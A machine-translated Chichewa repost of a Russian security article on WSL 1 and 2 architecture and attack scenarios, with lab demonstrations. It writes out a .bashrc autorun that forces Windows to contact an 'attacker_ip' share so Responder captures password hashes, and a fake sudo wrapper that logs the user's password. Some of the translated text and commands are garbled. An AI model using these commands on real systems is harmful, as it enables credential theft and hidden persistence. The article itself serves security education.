Pulogalamu ya ProHoster > Blog > Ulamuliro > Zoyeserera za WSL. Gawo 1

Zoyeserera za WSL. Gawo 1

Hello, hab! OTUS iyambitsa maphunziro atsopano mu Okutobala "Linux Security". Poyembekezera kuyamba kwa maphunzirowa, tikugawana nanu nkhani yolembedwa ndi mmodzi wa aphunzitsi athu, Alexander Kolesnikov.

Zoyeserera za WSL. Gawo 1

Mu 2016, Microsoft idayambitsa ukadaulo watsopano wa WSL ku gulu la IT (Wamavomereza Subsystem kwa Linux), zomwe m'tsogolomu zidapangitsa kuti zitheke kugwirizanitsa opikisana omwe sanagwirizane omwe anali kumenyera kutchuka pakati pa ogwiritsa ntchito wamba komanso apamwamba a OS: Windows ndi Linux. Ukadaulo uwu udapangitsa kuti zitheke kugwiritsa ntchito zida za Linux OS m'malo a Windows popanda kufunikira kuyendetsa Linux, mwachitsanzo, kugwiritsa ntchito Multi-boot. Pa Habr mutha kupeza zolemba zambiri zofotokoza zaubwino wogwiritsa ntchito WSL. Komabe, mwatsoka, pa nthawi ya kulengedwa kwa nkhaniyi, palibe maphunziro okhudzana ndi chitetezo cha symbiosis ya machitidwe opangira opaleshoni omwe adapezeka pa izi. Cholemba ichi chikhala kuyesa kukonza izi. Nkhaniyi ifotokoza za zomangamanga za WSL 1 ndi 2 ndikuwunika zitsanzo zingapo za kuukira kwamakina ogwiritsa ntchito matekinoloje awa. Nkhaniyi yagawidwa m'magawo awiri. Yoyamba ipereka njira zazikulu zowukira zochokera ku Linux ndi Windows. Nkhani yachiwiri iphatikiza kukhazikitsa malo oyeserera ndi kubweza ziwonetserozo.

WSL 1: Zomangamanga

Kuti mudumphire molondola kwambiri pazachitetezo cha WSL, ndikofunikira kudziwa zazikuluzikulu zomwe zimakhudzana ndi kukhazikitsidwa kwa subsystem. Imodzi mwazinthu zazikulu zomwe ogwiritsa ntchito adathetsedwera ndi WSL ndikutha kugwira ntchito kudzera pa Linux terminal pagulu lomwe lili ndi Windows OS. Komanso, kuyanjana komwe kumaperekedwa kunali kwachilengedwe kotero kuti Linux executables (ELFs) imatha kuyendetsedwa mwachindunji pa Windows. Kuti mukwaniritse zolinga izi, kachitidwe kakang'ono kapadera kadapangidwa mkati Windows 10 yomwe imakupatsani mwayi woyendetsa mapulogalamu a Linux pogwiritsa ntchito ma foni apadera - chifukwa chake, kuyesa kudapangidwa kupanga mapu a Linux syscalls pa Windows. Izi zidakhazikitsidwa mwakuthupi powonjezera madalaivala atsopano ndi mawonekedwe atsopano. Mwachiwonekere zomangazo zinkawoneka motere:

Zoyeserera za WSL. Gawo 1

M'malo mwake, kulumikizana ndi makina opangira a Linux kudakonzedwa kudzera mu ma module angapo a kernel ndi njira yapadera - pico. Kuchokera pa chithunzi pamwambapa, mutha kuwona kuti njira yomwe ikuyendetsedwera pa Linux pa wolandirayo iyenera kukhala yachilengedwe ndipo iyenera kugwiritsa ntchito zomwezo monga ma Windows wamba. Koma bwanji kukwaniritsa izi? Mu polojekiti Drawbridge Malingaliro opangira Windows adapangidwa omwe adapereka magawo onse ofunikira (kutengera mtundu wake) kuti agwiritse ntchito OS ina.

Zindikirani kuti zomwe zaperekedwazo zidapangitsa kuti zitheke kusayang'ana makina ogwiritsira ntchito (makamaka, Windows), momwe dongosolo la OS likuyembekezeka kukhazikitsidwa, ndikuwonetsa njira wamba.

Chifukwa chake, kugwiritsa ntchito kulikonse mkati mwa njira ya pico kumatha kuyenda mosasamala za Windows kernel:

  1. Mavuto okhudzana ndi kumasulira kwa mafoni a dongosolo ayenera kuthetsedwa ndi opereka apadera;
  2. Kuwongolera kolowera kuyenera kuchitika kudzera mu Security Monitor. Chowunikiracho chili mu kernel ndipo chifukwa chake Windows idafunikira kukweza mu mawonekedwe a dalaivala watsopano yemwe atha kukhala wopereka njira zotere. Njira ya prototype pico ikuwonetsedwa mwadongosolo pansipa:

Zoyeserera za WSL. Gawo 1

Popeza ma fayilo a Linux amagwiritsa ntchito mafayilo okhudzidwa ndi milandu ndi mayina, mitundu iwiri yamafayilo idawonjezedwa ku Windows kuti igwire ntchito ndi WSL - VolFS ndi DriveFS. VolFS ndikukhazikitsa mafayilo a Linux, DriveFS ndi fayilo yomwe imagwira ntchito molingana ndi malamulo a Windows, koma imatha kusankha kukhudzidwa kwamilandu.

WSL 2

WSL 1 inali ndi malire angapo omwe sanalole kuti agwiritsidwe ntchito kuthetsa ntchito zambiri: mwachitsanzo, inalibe mphamvu yogwiritsira ntchito Linux 32-bit, ndipo kunali kosatheka kugwiritsa ntchito madalaivala a chipangizo. Chifukwa chake, mu 2020, WSL 2 idatulutsidwa, zomwe zidasintha njira yopangira kagawo kakang'ono. WSL 2 ndi makina owoneka bwino omwe amafanana ndi mawonekedwe a WSL 1. Tsopano, kutengera ndi zovuta zomwe zathetsedwa ndi wogwiritsa ntchito Windows OS, mutha kusankha mtundu wofunikira wa Linux subsystem. Pofuna kuchepetsa zovuta zomwe zingatheke, WSL 2 inakhazikitsidwa pogwiritsa ntchito Hyper-V mkati Windows 10. Mu mawonekedwe awa, Windows ili ndi mphamvu yoyendetsa kernel ya Linux payokha. Ndikoyenera kukumbukira kuti mtundu 1 wa WSL unayambitsidwa ngati mawonekedwe a beta omwe amayenera kuwonetsa momwe Windows ikukulira mderali, kotero kuti kusintha kwa Hyper-V kunali kosapeweka. Zomangamanga zomaliza zikuwoneka motere:

Zoyeserera za WSL. Gawo 1

Mu mtundu uwu, mazenera a Windows ndi Linux ali ndi zinthu zawozawo ndipo mphambanoyo imapezeka mu fayilo yokhayo, koma mphambano iyi siinathe. Kuyanjana pakati pa mafayilo amachitidwe kumachitika kudzera pa kasitomala-seva wrapper yomwe imagwira ntchito pogwiritsa ntchito protocol ya 9P.

Masiku ano Microsoft imapereka mwayi wosintha pakati pa WSL 1 ndi WSL 2. Mabaibulo onsewa alipo kuti agwiritsidwe ntchito.

WSL Security

Pakadali pano, pali ntchito zingapo zofotokozera njira zina zogwiritsira ntchito zida zovomerezeka za OS kuti ziwononge kulumikizana pakati pa ma subsystems. Tidzagwiritsa ntchito zolemba zawo kuti tiwone kufunikira kwa ziwonetserozo panthawi yolemba. Mndandanda wazovuta ndi zochitika:

1. Kukhazikitsa dongosolo la mafayilo: ufulu wopeza, kupezeka kwa maupangiri ogawana / njira zosinthira deta.

Kafukufuku adachitika kuti adziwe kuphwanya malamulo ofikira kuchokera Linux FS-> Windows FS, Windows FS-> Linux FS. Kafukufuku wawonetsa kuthekera kosintha fayilo yomwe yaperekedwa mkati mwa OS yomwe mukufuna. Kuyesera kunapangidwanso m'malo, kupanga zobwereza ndikuchotsa gawo la mafayilo.

Zochitika:

  • A. Attack kuchokera ku Windows opareting system - kusinthidwa kwa mafayilo kuchokera ku /etc directory ya Linux OS.
  • B. Attack kuchokera ku Linux operating system - kusinthidwa kwamafayilo muzolembera: C:Windows, C:Program Files, C:Users<User>

2. Kukhazikitsa kwa network stack.

Kafukufukuyu adachitika pogwiritsa ntchito zitsanzo za kuukira kwa Linux pa Windows. Mawonekedwe a network stack adagwiritsidwa ntchito, mwachitsanzo, njira zotsimikizira pazinthu zosiyanasiyana.

Zochitika:

  • Kutsegula mwayi wopita ku doko lomwe lili ndi Windows system
  • Kutsegula doko popanda ufulu woyenera
  • Kuthamangitsa chipolopolo chosinthira pogwiritsa ntchito fayilo ya elf pa Windows opaleshoni.

3. Kubisa kukhazikitsidwa kwa njira zoyipa zamapulogalamu pogwiritsa ntchito kagawo kakang'ono ka WSL.

Kafukufukuyu adachokera pa mfundo yosavuta - ma subsystems achitetezo sangathe kusokoneza zochitika mu kernel ina yomwe imagwira ntchito pogwiritsa ntchito wopereka wovomerezeka kuchokera kumayendedwe opangira pa WSL 1. Pankhani ya WSL 2, palibe njira yowonera zochitika zomwe zimachitika. mu kernel yosiyana mkati mwa makina opepuka owoneka bwino.

Zochitika:

1) Yambitsani pulogalamu yofikira kutali ndi dongosolo ndikuwona zochitika zomwe zidalowetsedwa.

Kuyesera kwa WSL 1: kuthamangitsidwa kwa hash (Windows)

Pomaliza tinafika ku gawo lothandizira. Choyamba, muyenera kukhazikitsa malo oyesera. Zoyesera zonse zidzachitidwa pa benchi yokhala ndi Windows 10 2004. Chithunzi cha Ubuntu 18.04 chinasankhidwa kukhala chithunzi cha machitidwe opangira WSL. Chithunzicho chinasankhidwa mwachisawawa, ndipo china chilichonse chidzagwira ntchito mofanana. Malamulo opangira choyimira:

Muyenera kuyambitsa powershell.exe monga woyang'anira.

Kwa WSL 1 muyenera kuyendetsa malamulo:

  1. Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux #Π’ΠΊΠ»ΡŽΡ‡ΠΈΡ‚ΡŒ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΡŽ WSL
  2. Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804

-OutFile ~/Ubuntu.appx -UseBasicParsing #Π—Π°Π³Ρ€ΡƒΠ·ΠΈΡ‚ΡŒ ΠΎΠ±Ρ€Π°Π· Linux ΠΈΠ· ΠΌΠ°Π³Π°Π·ΠΈΠ½Π° Microsoft

  • Ubuntu.appx install β€”root #Установим ΠΎΠ±Ρ€Π°Π·
  • Π’ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎ, придСтся ΠΏΡ€ΠΎΠΊΠ»ΠΈΠΊΠ°Ρ‚ΡŒ процСсс настройки ΠΈ ΡΠΎΠ·Π΄Π°Ρ‚ΡŒ Π½ΠΎΠ²ΠΎΠ³ΠΎ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π±ΡƒΠ΄Π΅Ρ‚ ΠΈΠΌΠ΅Ρ‚ΡŒ мСньшС ΠΏΡ€Π°Π², Ρ‡Π΅ΠΌ root. Для Π½Π°ΡˆΠΈΡ… тСстов это Π±ΡƒΠ΄Π΅Ρ‚ ΠΎΠ±Ρ‹Ρ‡Π½Ρ‹ΠΉ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ sam.
  • Restart-Computer #ΠŸΠ΅Ρ€Π΅Π·Π°Π³Ρ€ΡƒΠ·ΠΈΠΌ

    • Mukayambiranso kuyimirira, mutha kuyimbira lamulo la bash. Ngati zonse zikuyenda bwino, mudzawona zotsatira zofanana ndi izi mu Windows console:

    Zoyeserera za WSL. Gawo 1

    Tigwiritsa ntchito kugawa kwa Kali Linux ngati makina owukira; makina onse ayenera kukhala pa netiweki ya komweko.

    Tiyerekeze kuti tili ndi mwayi wopeza WSL pamakina a Windows. Tiyeni tiyese kuukira makina opangira a Linux poyimba lamulo kuchokera ku Linux. Kuti tigwiritse ntchito chiwonongekocho, tidzagwiritsa ntchito njira yosavuta ya autorun - tidzawonjezera zolemba zathu kuti tigwiritse ntchito mu Linux. Kuti muchite izi muyenera kusintha fayilo .bashrc.

    Pa makina okhala ndi WSL timachita:

    	1. bash
	2. ΠŸΠ΅Ρ€Π΅Ρ…ΠΎΠ΄ΠΈΠΌ Π² домашнюю Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡŽ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ: cd /home/sam/
	2. echo  Β«/home/sam/.attack.shΒ» >> .bashrc
	3. echo Β«icalcs.exe Β» \\\\attacker_ip\\shareName\\Β» > /dev/null 2>&1Β» >> .attack.sh
	4. chmod u+x .attack.sh
	5. exit

    Pa makina a Kali Linux timayendetsa:

    1. Responder -I eth0 -rdvw

    Pa makina a Windows, tiyeni tiyambitse bash.

    Tikuyembekezera zotsatira pamakina a Kali Linux:

    Zoyeserera za WSL. Gawo 1

    Chifukwa chake, tidapeza ma hashes a Windows kudzera pagawo laling'ono la WSL potsatira lamulo pa Linux.

    Kuyesa kwa WSL 1: kupeza mawu achinsinsi (Linux OS)

    Tiyeni tichitenso kuyesa kumodzi. Pa cheke ichi tidzawonjezera ku fayilo .bashrc malamulo angapo kuti mupeze mawu achinsinsi ogwiritsira ntchito Linux.

    Tiyeni tiyambe bash ndikuyika malamulo:

    1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txtΒ» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit

    Kuti amalize bwino kuukira, wosuta Sam ayenera kuyimbira sudo mu terminal ya Linux. Pambuyo pake, mawu achinsinsi a Linux OS adzakhala mufayilo pass.txt:

    Zoyeserera za WSL. Gawo 1

    Kukhazikitsidwa kwa zowukirazo kunaperekedwa kuti zidziwitse zongopeka chabe.

    Gawo lotsatira la nkhaniyi lifotokoza za kukhazikitsidwa kwa protocol ya 9P, lingalirani za kupanga scanner ya protocol iyi, komanso kuchita chiwembu pogwiritsa ntchito.

    Mndandanda wa zolemba zakale

    Zoyeserera za WSL. Gawo 1

    Werengani zambiri

    Source: www.habr.com

    Kuwonjezera ndemanga